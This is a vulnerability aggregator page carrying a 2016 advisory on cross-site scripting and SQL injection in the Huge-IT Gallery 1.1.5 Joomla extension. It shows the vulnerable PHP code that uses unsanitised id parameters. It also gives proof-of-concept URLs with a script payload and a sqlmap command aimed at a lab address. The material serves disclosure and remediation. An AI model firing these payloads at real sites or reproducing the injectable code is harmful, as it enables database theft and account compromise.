Vulners
Lucene search
Joomla Huge IT Gallery 1.1.5 Cross Site Scripting / SQL Injection
🗓️ 24 Jul 2016 00:00:00Reported by Larry W. CashdollarType 
packetstorm🔗 packetstormsecurity.com👁 38 Views
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | Multiple vulnerabilities in the Huge-IT Image Gallery extension for Joomla! | 28 Jul 201600:00 | – | cnvd |
 | CVE-2016-1000113 | 6 Oct 201614:00 | – | cve |
 | CVE-2016-1000113 | 6 Oct 201614:00 | – | cvelist |
 | EUVD-2016-1057 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-1000113 | 6 Oct 201614:59 | – | nvd |
 | Design/Logic Flaw | 6 Oct 201614:59 | – | prion |
`Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla
Author: Larry W. Cashdollar, @_larry0 Elitza Neytcheva, @E1337za
Date: 2016-07-14
Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro
Vendor: huge-it.com
Vendor Notified: 2016-07-15, fixed v1.1.6
Vendor Contact: [email protected]
Advisory: http://www.vapidlabs.com/advisory.php?v=164
Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links.
Vulnerability:
The attacker does not need to be logged in to Joomla to exploit this vulnerability:
SQL in code via id parameter:
./administrator/components/com_gallery/models/gallery.php
51 public function getPropertie() {
52 $db = JFactory::getDBO();
53 $id_cat = JRequest::getVar('id');
54 $query = $db->getQuery(true);
55 $query->select('#__huge_itgallery_images.name as name,'
56 . '#__huge_itgallery_images.id ,'
57 . '#__huge_itgallery_gallerys.name as portName,'
58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width');
59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images'));
60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat);
61 $query->order('ordering desc');
62
64 $db->setQuery($query);
65 $results = $db->loadObjectList();
66 return $results;
67 }
XSS is here:
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \;
./administrator/components/com_gallery/views/gallery/tmpl/default.php
root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \;
256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" >
CVE-2016-1000113
Exploit Code:
XSS PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E
SQLi PoC
http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE
http://192.168.0.125/index.php?option=com_gallery&id=HERE
Video by 'Exploiter':
https://www.youtube.com/watch?v=U67iQ3-xcho
$ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jul 2016 00:00Current
0.8Low risk
Vulners AI Score0.8
EPSS0.02773